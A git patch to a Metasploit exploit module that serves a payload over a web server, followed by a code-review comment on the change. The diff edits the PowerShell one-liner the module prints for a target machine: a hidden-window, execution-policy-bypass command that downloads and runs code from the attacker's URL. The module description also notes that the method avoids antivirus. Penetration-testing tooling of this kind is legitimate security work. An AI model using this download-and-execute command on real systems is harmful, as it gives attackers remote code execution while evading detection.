From f79d3f759167ae54ae7f5cadea6c7a8a62d01aa9 Mon Sep 17 00:00:00 2001
From: Meatballs
Date: Wed, 24 Jul 2013 17:48:03 +0100
Subject: [PATCH] Shorten cmd
---
 modules/exploits/windows/misc/psh_web_delivery.rb | 10 ++++++----
 1 file changed, 6 insertions(+), 4 deletions(-)
diff --git a/modules/exploits/windows/misc/psh_web_delivery.rb b/modules/exploits/windows/misc/psh_web_delivery.rb
index 83e09ffd133a..382a2b6c8f33 100644
--- a/modules/exploits/windows/misc/psh_web_delivery.rb
+++ b/modules/exploits/windows/misc/psh_web_delivery.rb
@@ -14,12 +14,12 @@ class Metasploit3 < Msf::Exploit::Remote
 def initialize(info = {})
 super(update_info(info,
-'Name' => 'Powershell Web Delivery',
+'Name' => 'Powershell Payload Web Delivery',
 'Description' => %q{
 Quickly fires up a web server that serves the payload in powershell. The command will start powershell and then download and execute the payload. You can extract the IEX command to execute directly from powershell.
-The main goal of this module is that a session can be quickly established
+The main purpose of this module is to quickly establish a session
 on a target machine when you have to manually type in the command yourself, e.g. RDP Session, Local Access or maybe Remote Command Exec. This does not write to disk so is unlikely to trigger AV solutions and will
@@ -36,7 +36,9 @@ def initialize(info = {})
 ],
 'References' =>
 [
-[ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ]
+[ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ],
+[ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
+[ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
 ],
 'Platform' => 'win',
 'Targets' =>
@@ -58,7 +60,7 @@ def primer
 url = get_uri()
 download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
 print_status("Run the following command on the target machine:")
-print_line("powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"")
+print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
 end
 end
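Review bot: The new `print_line` does more than the commit title "Shorten cmd" describes: besides abbreviating the switches it drops `-noexit` and changes the execution-policy value from `unrestricted` to `bypass`, and neither behavioural change is mentioned in the message or the code. Both deserve a sentence in the commit description or a comment above the line, so the next maintainer does not read the line as a purely cosmetic rewrite. I would also document the abbreviations, since the short forms are prefix shortcuts whose long spellings the removed line showed: `# -w = -WindowStyle, -nop = -NoProfile, -ep = -ExecutionPolicy, -c = -Command (see the powershellmagazine reference)`. The enclosing `primer` method begins before this hunk.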